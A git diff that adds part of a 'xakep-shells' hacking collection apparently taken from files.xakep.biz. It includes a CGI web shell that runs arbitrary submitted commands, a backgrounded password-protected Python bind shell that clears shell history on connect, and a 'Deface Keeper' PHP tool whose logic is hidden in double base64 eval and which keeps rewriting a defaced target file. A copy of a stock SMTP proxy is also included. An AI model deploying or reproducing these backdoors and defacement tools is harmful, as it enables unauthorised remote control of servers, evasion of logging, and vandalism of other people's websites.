+            if  type(theform[field]) != type([]):
+                data[field] = theform[field].value
+            else:
+                values = map(lambda x: x.value, theform[field])     # allows for list type values
+                data[field] = values
+    return data
+
+
+theformhead = """<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>
+<BODY><CENTER>
+<H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>
+<B><I>By Fuzzyman</B></I><BR>
+"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'
+
+theform = """<H2>Enter Command</H2>
+<FORM METHOD=\"""" + METHOD + '" action="' + scriptname + """\">
+<input name=cmd type=text><BR>
+<input type=submit value="Submit"><BR>
+</FORM><BR><BR>"""
+bodyend = '</BODY></HTML>'
+errormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'
+
+################################################################
+# main body of the script
+
+if __name__ == '__main__':
+    print "Content-type: text/html"         # this is the header to the server
+    print                                   # so is this blank line
+    form = cgi.FieldStorage()
+    data = getform(['cmd'],form)
+    thecmd = data['cmd']
+    print theformhead
+    print theform
+    if thecmd:
+        print '<HR><BR><BR>'
+        print '<B>Command : ', thecmd, '<BR><BR>'
+        print 'Result : <BR><BR>'
+        try:
+            child_stdin, child_stdout = os.popen2(thecmd)
+            child_stdin.close()
+            result = child_stdout.read()
+            child_stdout.close()
+            print result.replace('\n', '<BR>')
+
+        except Exception, e:                      # an error in executing the command
+            print errormess
+            f = StringIO()
+            print_exc(file=f)
+            a = f.getvalue().splitlines()
+            for line in a:
+                print line
+
+    print bodyend
+
+
+"""
+TODO/ISSUES
+
+
+
+CHANGELOG
+
+07-07-04        Version 1.0.0
+A very basic system for executing shell commands.
+I may expand it into a proper 'environment' with session persistence...
+"""
diff --git a/xakep-shells/PY/smtpd.py.txt b/xakep-shells/PY/smtpd.py.txt
new file mode 100644
index 0000000..7acf12b
--- /dev/null
+++ b/xakep-shells/PY/smtpd.py.txt
@@ -0,0 +1,549 @@
+#!/usr/local/bin/python
+"""An RFC 2821 smtp proxy.
+
+Usage: %(program)s [options] [localhost:localport [remotehost:remoteport]]
+
+Options:
+
+    --nosetuid
+    -n
+        This program generally tries to setuid `nobody', unless this flag is
+        set.  The setuid call will fail if this program is not run as root (in
+        which case, use this flag).
+
+    --version
+    -V
+        Print the version number and exit.
+
+    --class classname
+    -c classname
+        Use `classname' as the concrete SMTP proxy class.  Uses `PureProxy' by
+        default.
+
+    --debug
+    -d
+        Turn on debugging prints.
+
+    --help
+    -h
+        Print this message and exit.
+
+Version: %(__version__)s
+
+If localhost is not given then `localhost' is used, and if localport is not
+given then 8025 is used.  If remotehost is not given then `localhost' is used,
+and if remoteport is not given, then 25 is used.
+"""
+
+
+# Overview:
+#
+# This file implements the minimal SMTP protocol as defined in RFC 821.  It
+# has a hierarchy of classes which implement the backend functionality for the
+# smtpd.  A number of classes are provided:
+#
+#   SMTPServer - the base class for the backend.  Raises NotImplementedError
+#   if you try to use it.
+#
+#   DebuggingServer - simply prints each message it receives on stdout.
+#
+#   PureProxy - Proxies all messages to a real smtpd which does final
+#   delivery.  One known problem with this class is that it doesn't handle
+#   SMTP errors from the backend server at all.  This should be fixed
+#   (contributions are welcome!).
+#
+#   MailmanProxy - An experimental hack to work with GNU Mailman
+#   <www.list.org>.  Using this server as your real incoming smtpd, your
+#   mailhost will automatically recognize and accept mail destined to Mailman
+#   lists when those lists are created.  Every message not destined for a list
+#   gets forwarded to a real backend smtpd, as with PureProxy.  Again, errors
+#   are not handled correctly yet.
+#
+# Please note that this script requires Python 2.0
+#
+# Author: Barry Warsaw <barry@python.org>
+#
+# TODO:
+#
+# - support mailbox delivery
+# - alias files
+# - ESMTP
+# - handle error codes from the backend smtpd
+
+import sys
+import os
+import errno
+import getopt
+import time
+import socket
+import asyncore
+import asynchat
+
+__all__ = ["SMTPServer","DebuggingServer","PureProxy","MailmanProxy"]
+
+program = sys.argv[0]
+__version__ = 'Python SMTP proxy version 0.2'
+
+
+class Devnull:
+    def write(self, msg): pass
+    def flush(self): pass
+
+
+DEBUGSTREAM = Devnull()
+NEWLINE = '\n'
+EMPTYSTRING = ''
+COMMASPACE = ', '
+
+
+
+def usage(code, msg=''):
+    print >> sys.stderr, __doc__ % globals()
+    if msg:
+        print >> sys.stderr, msg
+    sys.exit(code)
+
+
+
+class SMTPChannel(asynchat.async_chat):
+    COMMAND = 0
+    DATA = 1
+
+    def __init__(self, server, conn, addr):
+        asynchat.async_chat.__init__(self, conn)
+        self.__server = server
+        self.__conn = conn
+        self.__addr = addr
+        self.__line = []
+        self.__state = self.COMMAND
+        self.__greeting = 0
+        self.__mailfrom = None
+        self.__rcpttos = []
+        self.__data = ''
+        self.__fqdn = socket.getfqdn()
+        self.__peer = conn.getpeername()
+        print >> DEBUGSTREAM, 'Peer:', repr(self.__peer)
+        self.push('220 %s %s' % (self.__fqdn, __version__))
+        self.set_terminator('\r\n')
+
+    # Overrides base class for convenience
+    def push(self, msg):
+        asynchat.async_chat.push(self, msg + '\r\n')
+
+    # Implementation of base class abstract method
+    def collect_incoming_data(self, data):
+        self.__line.append(data)
+
+    # Implementation of base class abstract method
+    def found_terminator(self):
+        line = EMPTYSTRING.join(self.__line)
+        print >> DEBUGSTREAM, 'Data:', repr(line)
+        self.__line = []
+        if self.__state == self.COMMAND:
+            if not line:
+                self.push('500 Error: bad syntax')
+                return
+            method = None
+            i = line.find(' ')
+            if i < 0:
+                command = line.upper()
+                arg = None
+            else:
+                command = line[:i].upper()
+                arg = line[i+1:].strip()
+            method = getattr(self, 'smtp_' + command, None)
+            if not method:
+                self.push('502 Error: command "%s" not implemented' % command)
+                return
+            method(arg)
+            return
+        else:
+            if self.__state != self.DATA:
+                self.push('451 Internal confusion')
+                return
+            # Remove extraneous carriage returns and de-transparency according
+            # to RFC 821, Section 4.5.2.
+            data = []
+            for text in line.split('\r\n'):
+                if text and text[0] == '.':
+                    data.append(text[1:])
+                else:
+                    data.append(text)
+            self.__data = NEWLINE.join(data)
+            status = self.__server.process_message(self.__peer,
+                                                   self.__mailfrom,
+                                                   self.__rcpttos,
+                                                   self.__data)
+            self.__rcpttos = []
+            self.__mailfrom = None
+            self.__state = self.COMMAND
+            self.set_terminator('\r\n')
+            if not status:
+                self.push('250 Ok')
+            else:
+                self.push(status)
+
+    # SMTP and ESMTP commands
+    def smtp_HELO(self, arg):
+        if not arg:
+            self.push('501 Syntax: HELO hostname')
+            return
+        if self.__greeting:
+            self.push('503 Duplicate HELO/EHLO')
+        else:
+            self.__greeting = arg
+            self.push('250 %s' % self.__fqdn)
+
+    def smtp_NOOP(self, arg):
+        if arg:
+            self.push('501 Syntax: NOOP')
+        else:
+            self.push('250 Ok')
+
+    def smtp_QUIT(self, arg):
+        # args is ignored
+        self.push('221 Bye')
+        self.close_when_done()
+
+    # factored
+    def __getaddr(self, keyword, arg):
+        address = None
+        keylen = len(keyword)
+        if arg[:keylen].upper() == keyword:
+            address = arg[keylen:].strip()
+            if not address:
+                pass
+            elif address[0] == '<' and address[-1] == '>' and address != '<>':
+                # Addresses can be in the form <person@dom.com> but watch out
+                # for null address, e.g. <>
+                address = address[1:-1]
+        return address
+
+    def smtp_MAIL(self, arg):
+        print >> DEBUGSTREAM, '===> MAIL', arg
+        address = self.__getaddr('FROM:', arg)
+        if not address:
+            self.push('501 Syntax: MAIL FROM:<address>')
+            return
+        if self.__mailfrom:
+            self.push('503 Error: nested MAIL command')
+            return
+        self.__mailfrom = address
+        print >> DEBUGSTREAM, 'sender:', self.__mailfrom
+        self.push('250 Ok')
+
+    def smtp_RCPT(self, arg):
+        print >> DEBUGSTREAM, '===> RCPT', arg
+        if not self.__mailfrom:
+            self.push('503 Error: need MAIL command')
+            return
+        address = self.__getaddr('TO:', arg)
+        if not address:
+            self.push('501 Syntax: RCPT TO: <address>')
+            return
+        self.__rcpttos.append(address)
+        print >> DEBUGSTREAM, 'recips:', self.__rcpttos
+        self.push('250 Ok')
+
+    def smtp_RSET(self, arg):
+        if arg:
+            self.push('501 Syntax: RSET')
+            return
+        # Resets the sender, recipients, and data, but not the greeting
+        self.__mailfrom = None
+        self.__rcpttos = []
+        self.__data = ''
+        self.__state = self.COMMAND
+        self.push('250 Ok')
+
+    def smtp_DATA(self, arg):
+        if not self.__rcpttos:
+            self.push('503 Error: need RCPT command')
+            return
+        if arg:
+            self.push('501 Syntax: DATA')
+            return
+        self.__state = self.DATA
+        self.set_terminator('\r\n.\r\n')
+        self.push('354 End data with <CR><LF>.<CR><LF>')
+
+
+
+class SMTPServer(asyncore.dispatcher):
+    def __init__(self, localaddr, remoteaddr):
+        self._localaddr = localaddr
+        self._remoteaddr = remoteaddr
+        asyncore.dispatcher.__init__(self)
+        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
+        # try to re-use a server port if possible
+        self.set_reuse_addr()
+        self.bind(localaddr)
+        self.listen(5)
+        print >> DEBUGSTREAM, \
+              '%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % (
+            self.__class__.__name__, time.ctime(time.time()),
+            localaddr, remoteaddr)
+
+    def handle_accept(self):
+        conn, addr = self.accept()
+        print >> DEBUGSTREAM, 'Incoming connection from %s' % repr(addr)
+        channel = SMTPChannel(self, conn, addr)
+
+    # API for "doing something useful with the message"
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        """Override this abstract method to handle messages from the client.
+
+        peer is a tuple containing (ipaddr, port) of the client that made the
+        socket connection to our smtp port.
+
+        mailfrom is the raw address the client claims the message is coming
+        from.
+
+        rcpttos is a list of raw addresses the client wishes to deliver the
+        message to.
+
+        data is a string containing the entire full text of the message,
+        headers (if supplied) and all.  It has been `de-transparencied'
+        according to RFC 821, Section 4.5.2.  In other words, a line
+        containing a `.' followed by other text has had the leading dot
+        removed.
+
+        This function should return None, for a normal `250 Ok' response;
+        otherwise it returns the desired response string in RFC 821 format.
+
+        """
+        raise NotImplementedError
+
+
+
+class DebuggingServer(SMTPServer):
+    # Do something with the gathered message
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        inheaders = 1
+        lines = data.split('\n')
+        print '---------- MESSAGE FOLLOWS ----------'
+        for line in lines:
+            # headers first
+            if inheaders and not line:
+                print 'X-Peer:', peer[0]
+                inheaders = 0
+            print line
+        print '------------ END MESSAGE ------------'
+
+
+
+class PureProxy(SMTPServer):
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        lines = data.split('\n')
+        # Look for the last header
+        i = 0
+        for line in lines:
+            if not line:
+                break
+            i += 1
+        lines.insert(i, 'X-Peer: %s' % peer[0])
+        data = NEWLINE.join(lines)
+        refused = self._deliver(mailfrom, rcpttos, data)
+        # TBD: what to do with refused addresses?
+        print >> DEBUGSTREAM, 'we got some refusals:', refused
+
+    def _deliver(self, mailfrom, rcpttos, data):
+        import smtplib
+        refused = {}
+        try:
+            s = smtplib.SMTP()
+            s.connect(self._remoteaddr[0], self._remoteaddr[1])
+            try:
+                refused = s.sendmail(mailfrom, rcpttos, data)
+            finally:
+                s.quit()
+        except smtplib.SMTPRecipientsRefused, e:
+            print >> DEBUGSTREAM, 'got SMTPRecipientsRefused'
+            refused = e.recipients
+        except (socket.error, smtplib.SMTPException), e:
+            print >> DEBUGSTREAM, 'got', e.__class__
+            # All recipients were refused.  If the exception had an associated
+            # error code, use it.  Otherwise,fake it with a non-triggering
+            # exception code.
+            errcode = getattr(e, 'smtp_code', -1)
+            errmsg = getattr(e, 'smtp_error', 'ignore')
+            for r in rcpttos:
+                refused[r] = (errcode, errmsg)
+        return refused
+
+
+
+class MailmanProxy(PureProxy):
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        from cStringIO import StringIO
+        from Mailman import Utils
+        from Mailman import Message
+        from Mailman import MailList
+        # If the message is to a Mailman mailing list, then we'll invoke the
+        # Mailman script directly, without going through the real smtpd.
+        # Otherwise we'll forward it to the local proxy for disposition.
+        listnames = []
+        for rcpt in rcpttos:
+            local = rcpt.lower().split('@')[0]
+            # We allow the following variations on the theme
+            #   listname
+            #   listname-admin
+            #   listname-owner
+            #   listname-request
+            #   listname-join
+            #   listname-leave
+            parts = local.split('-')
+            if len(parts) > 2:
+                continue
+            listname = parts[0]
+            if len(parts) == 2:
+                command = parts[1]
+            else:
+                command = ''
+            if not Utils.list_exists(listname) or command not in (
+                    '', 'admin', 'owner', 'request', 'join', 'leave'):
+                continue
+            listnames.append((rcpt, listname, command))
+        # Remove all list recipients from rcpttos and forward what we're not
+        # going to take care of ourselves.  Linear removal should be fine
+        # since we don't expect a large number of recipients.
+        for rcpt, listname, command in listnames:
+            rcpttos.remove(rcpt)
+        # If there's any non-list destined recipients left,
+        print >> DEBUGSTREAM, 'forwarding recips:', ' '.join(rcpttos)
+        if rcpttos:
+            refused = self._deliver(mailfrom, rcpttos, data)
+            # TBD: what to do with refused addresses?
+            print >> DEBUGSTREAM, 'we got refusals:', refused
+        # Now deliver directly to the list commands
+        mlists = {}
+        s = StringIO(data)
+        msg = Message.Message(s)
+        # These headers are required for the proper execution of Mailman.  All
+        # MTAs in existance seem to add these if the original message doesn't
+        # have them.
+        if not msg.getheader('from'):
+            msg['From'] = mailfrom
+        if not msg.getheader('date'):
+            msg['Date'] = time.ctime(time.time())
+        for rcpt, listname, command in listnames:
+            print >> DEBUGSTREAM, 'sending message to', rcpt
+            mlist = mlists.get(listname)
+            if not mlist:
+                mlist = MailList.MailList(listname, lock=0)
+                mlists[listname] = mlist
+            # dispatch on the type of command
+            if command == '':
+                # post
+                msg.Enqueue(mlist, tolist=1)
+            elif command == 'admin':
+                msg.Enqueue(mlist, toadmin=1)
+            elif command == 'owner':
+                msg.Enqueue(mlist, toowner=1)
+            elif command == 'request':
+                msg.Enqueue(mlist, torequest=1)
+            elif command in ('join', 'leave'):
+                # TBD: this is a hack!
+                if command == 'join':
+                    msg['Subject'] = 'subscribe'
+                else:
+                    msg['Subject'] = 'unsubscribe'
+                msg.Enqueue(mlist, torequest=1)
+
+
+
+class Options:
+    setuid = 1
+    classname = 'PureProxy'
+
+
+
+def parseargs():
+    global DEBUGSTREAM
+    try:
+        opts, args = getopt.getopt(
+            sys.argv[1:], 'nVhc:d',
+            ['class=', 'nosetuid', 'version', 'help', 'debug'])
+    except getopt.error, e:
+        usage(1, e)
+
+    options = Options()
+    for opt, arg in opts:
+        if opt in ('-h', '--help'):
+            usage(0)
+        elif opt in ('-V', '--version'):
+            print >> sys.stderr, __version__
+            sys.exit(0)
+        elif opt in ('-n', '--nosetuid'):
+            options.setuid = 0
+        elif opt in ('-c', '--class'):
+            options.classname = arg
+        elif opt in ('-d', '--debug'):
+            DEBUGSTREAM = sys.stderr
+
+    # parse the rest of the arguments
+    if len(args) < 1:
+        localspec = 'localhost:8025'
+        remotespec = 'localhost:25'
+    elif len(args) < 2:
+        localspec = args[0]
+        remotespec = 'localhost:25'
+    elif len(args) < 3:
+        localspec = args[0]
+        remotespec = args[1]
+    else:
+        usage(1, 'Invalid arguments: %s' % COMMASPACE.join(args))
+
+    # split into host/port pairs
+    i = localspec.find(':')
+    if i < 0:
+        usage(1, 'Bad local spec: %s' % localspec)
+    options.localhost = localspec[:i]
+    try:
+        options.localport = int(localspec[i+1:])
+    except ValueError:
+        usage(1, 'Bad local port: %s' % localspec)
+    i = remotespec.find(':')
+    if i < 0:
+        usage(1, 'Bad remote spec: %s' % remotespec)
+    options.remotehost = remotespec[:i]
+    try:
+        options.remoteport = int(remotespec[i+1:])
+    except ValueError:
+        usage(1, 'Bad remote port: %s' % remotespec)
+    return options
+
+
+
+if __name__ == '__main__':
+    options = parseargs()
+    # Become nobody
+    if options.setuid:
+        try:
+            import pwd
+        except ImportError:
+            print >> sys.stderr, \
+                  'Cannot import module "pwd"; try running with -n option.'
+            sys.exit(1)
+        nobody = pwd.getpwnam('nobody')[2]
+        try:
+            os.setuid(nobody)
+        except OSError, e:
+            if e.errno != errno.EPERM: raise
+            print >> sys.stderr, \
+                  'Cannot setuid "nobody"; try running with -n option.'
+            sys.exit(1)
+    classname = options.classname
+    if "." in classname:
+        lastdot = classname.rfind(".")
+        mod = __import__(classname[:lastdot], globals(), locals(), [""])
+        classname = classname[lastdot+1:]
+    else:
+        import __main__ as mod
+    class_ = getattr(mod, classname)
+    proxy = class_((options.localhost, options.localport),
+                   (options.remotehost, options.remoteport))
+    try:
+        asyncore.loop()
+    except KeyboardInterrupt:
+        pass 
diff --git a/xakep-shells/PY/wh_bindshell.py.txt b/xakep-shells/PY/wh_bindshell.py.txt
new file mode 100644
index 0000000..5a05e32
--- /dev/null
+++ b/xakep-shells/PY/wh_bindshell.py.txt
@@ -0,0 +1,86 @@
+#!/usr/bin/env python
+#####################
+#Coded by ~S/E/r/G~
+#mailto:serg[dot]web-hack.ru
+#version 1.2.1
+#
+#Use: python wh_bindshell.py [port] [password] | python wh_bindshell.py - for use
+#                                               default_settings
+#for make password:
+#   python -c"import md5;x=md5.new('you_password');print x.hexdigest()"
+#
+#bugz: ctrl+c etc =script stoped=\ (after reconnect it work)
+
+from socket import *
+import os
+import sys
+import md5
+import popen2
+
+#############_Default_#####################
+Port=50001                                #_default port
+Pass ='ac0b72df8bd2939ca4d1466d11c9846b'  #_default password ='web-hack'
+simvol='$ '                               #_prompt
+autocommands="unset HISTFILE;uname -a;id" #autostart=)
+kill_bsh='kbsh'                           #command for kill bindshell
+##########################################
+if len(sys.argv)>1:
+    Port=int(sys.argv[1])
+    print '[+]Port=',sys.argv[1]
+    if len(sys.argv)>2:
+        Pass=str(md5.new(sys.argv[2]).hexdigest())
+	print '[+]New_pass'
+
+try:
+    sockobj=socket(AF_INET,SOCK_STREAM)
+    sockobj.bind(('',Port))
+    sockobj.listen(5)
+except:
+    print '[-]SocketError',sys.exc_value
+    sys.exit(1)
+
+if os.fork()==0: #for start bindshell as proc and exit
+    while 1:
+        connection,address=sockobj.accept()
+        data=connection.recv(1024)
+        getpass=md5.new(data[:-2])
+        bsh_pid=os.getpid()
+        if getpass.hexdigest()==Pass:
+            if os.fork()==0:    
+                info=os.popen(autocommands).read()
+                connection.send(info)
+                while 1:
+                    data=connection.recv(1024)
+                    if not data:break
+                    if data[:-2]==kill_bsh:
+                        os.popen('kill '+str(bsh_pid))
+                        sys.exit(0)
+                    cmd_res,stdin,stderror=popen2.popen3(data[:-2])
+                    result= cmd_res.read()
+                    error=stderror.read()
+                    if error:
+                        connection.send(error)       
+                       
+                    for i in range(len(data.split())-1):
+                        if 'cd' in data.split()[i]:
+                            try:                            
+                                os.chdir(data.split()[i+1].split(';')[0])
+                            except:
+                                error='[-]Error '+str(sys.exc_value)+'\n'
+                                connection.send(error)
+    ###Prompt
+                    username=os.popen("whoami").read()
+                    adr=os.popen("uname -n").read()
+                    if username[:-1]=='root':
+                            simvol='# '
+                    path=os.getcwd()
+                    promt='['+username[:-1]+'@'+adr[:-1]+' '+path+']'+simvol
+    ###                  
+                    answer=result+promt
+                    connection.send(answer)
+        else:
+               connection.close()             
+sys.exit(0)
+        
+	    
+	    
diff --git a/xakep-shells/README.md b/xakep-shells/README.md
new file mode 100644
index 0000000..bf2c952
--- /dev/null
+++ b/xakep-shells/README.md
@@ -0,0 +1 @@
+from http://files.xakep.biz/shells/
diff --git a/xakep-shells/others/mod_joomla_shell.PNG b/xakep-shells/others/mod_joomla_shell.PNG
new file mode 100644
index 0000000..21b0f59
Binary files /dev/null and b/xakep-shells/others/mod_joomla_shell.PNG differ
diff --git a/xakep-shells/others/mod_joomla_shell.zip b/xakep-shells/others/mod_joomla_shell.zip
new file mode 100644
index 0000000..0462780
Binary files /dev/null and b/xakep-shells/others/mod_joomla_shell.zip differ
diff --git a/xakep-shells/others/tools/DefaceKeeper_0.2.php.txt b/xakep-shells/others/tools/DefaceKeeper_0.2.php.txt
new file mode 100644
index 0000000..27673f5
--- /dev/null
+++ b/xakep-shells/others/tools/DefaceKeeper_0.2.php.txt
@@ -0,0 +1,40 @@
+
+<html><title>Deface Keeper 0.2</title>
+<style>body{background-color:#333333;color:#999999;}
+input{color:#cccccc;
+border:1px solid #666666;
+background-color:#000000;
+}</style>
+<p align=center>
+<font face="Courier New" size="2">
+<p align=center>Deface Keeper 0.2</p>
+<p align=center>-=[definside editi0n]=-</p>
+</font>
+<b>//
+<pre>
+<form method="post" align="center">
+<img src="http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png" align="center">
+target fi1e:<br><input type="text" name="target" value="index.php"></br>
+s1eeep time:<br><input type="text" name="sleeep" value="1"></br>
+<input type="submit" value="Keep Deface" >
+
+Idea & Design: wt0vremr
+C0de & Release: Floord
+© 2010, <a href="http://www.k0d.cc">www.k0d.cc</a></form>
+<?php
+// Keeps your deface
+eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9kSEoxWlNrN0RRcHpa
+WFJmZEdsdFpWOXNhVzFwZENnd0tUc05DbWxtS0NGbGJYQjBlU2drDQpYMUJQVTFSYkozUmhjbWRs
+ZENkZEtTa05DbnNOQ25kb2FXeGxLSFJ5ZFdVcERRcDdEUW9rWm5BZ1BTQm1iM0JsYmlna1gxQlBV
+MVJiDQpKM1JoY21kbGRDZGRMQ0FuZHljcE93MEtKR1JsWm1GalpTQTlJQ0k4YUhSdGJENDhhR1Zo
+WkQ0OGRHbDBiR1UrTUhkdVpXUWdZbmtnDQphekJrTG1OalBDOTBhWFJzWlQ0OEwyaGxZV1ErUEhB
+Z1lXeHBaMjQ5WENKalpXNTBaWEpjSWo0OGFXMW5JSE55WXoxb2RIUndPaTh2DQpaMjl2WjJ4bExt
+NXRMbkoxTDJsdFlXZGxjeTloZG1GamNtOTNNUzVxY0djK1BDOXBiV2MrUEdadmJuUWdabUZqWlQx
+Y0lrTnZkWEpwDQpaWEpjSWo0OGNDQmhiR2xuYmoxY0ltTmxiblJsY2x3aVBqeGlQbVJsWm1GalpT
+QmllU0JyTUdRdVkyTWdkR1ZoYlR3dllqNDhMM0ErDQpQQzltYjI1MFBqd3ZjRDQ4TDJKdlpIaytQ
+QzlvZEcxc1BpSTdEUXBtZDNKcGRHVW9KR1p3TENBa1pHVm1ZV05sS1RzTkNtWmpiRzl6DQpaU2dr
+Wm5BcE93MEtjMnhsWlhBb0pGOVFUMU5VV3lkemJHVmxaWEFuWFNrN0RRcDlEUXA5IikpOw=="));
+?>
+</b></pre>
+</p>
+</html> 
\ No newline at end of file